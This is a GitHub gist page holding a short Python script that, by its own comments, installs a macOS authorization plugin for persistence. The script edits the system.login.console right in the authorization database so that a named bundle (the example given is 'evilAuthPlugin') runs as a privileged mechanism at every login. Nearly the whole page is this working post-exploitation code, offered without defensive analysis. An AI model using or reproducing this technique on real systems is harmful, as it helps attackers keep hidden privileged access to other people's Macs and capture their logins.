Skip to content

Instantly share code, notes, and snippets.

Last active October 14, 2018 15:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xorrior/656c2f0cdf0891926e99796625674877 to your computer and use it in GitHub Desktop.
Save xorrior/656c2f0cdf0891926e99796625674877 to your computer and use it in GitHub Desktop.
python script to install authorization plugin that requests system.login.console right
# install authorization plugin for persistence.
# orginal script here:
# system.login.console right should be used for auth plugins
# ex: evilAuthPlugin
import sys
import objc
from ctypes import CDLL, c_void_p, byref, c_char_p
from ctypes.util import find_library
from PyObjCTools import Conversion
Security = CDLL(find_library("Security.framework"))
AuthorizationRightSet = Security.AuthorizationRightSet
AuthorizationRightGet = Security.AuthorizationRightGet
AuthorizationCreate = Security.AuthorizationCreate
def authorization_right_get(right):
db_buffer = c_void_p()
AuthorizationRightGet(right, byref(db_buffer))
if db_buffer:
return objc.objc_object(c_void_p=db_buffer).mutableCopy()
return None
def authorization_right_set(right, value):
auth_ref = c_void_p()
AuthorizationCreate(None, None, 0, byref(auth_ref))
return AuthorizationRightSet(auth_ref, right, value.__c_void_p__(), None, None, None)
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Please provide the bundle name, without the extension"
bundle = sys.argv[1]
authright = "system.login.console"
db = authorization_right_get(authright)
i = db["mechanisms"].index("HomeDirMechanism:status") #Get the position of the last HomeDirMechanism
mechanismValue = u"{}:login,privileged".format(bundle)
# Convert the pyobjc object to a python object, something we can change
writeableDB = Conversion.pythonCollectionFromPropertyList(db, conversionHelper=None)
writeableDB['mechanisms'].insert(i+1, mechanismValue)
db = Conversion.propertyListFromPythonCollection(writeableDB, conversionHelper=None)
# Update the authorization database
authorization_right_set(authright, db)
print "Done"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment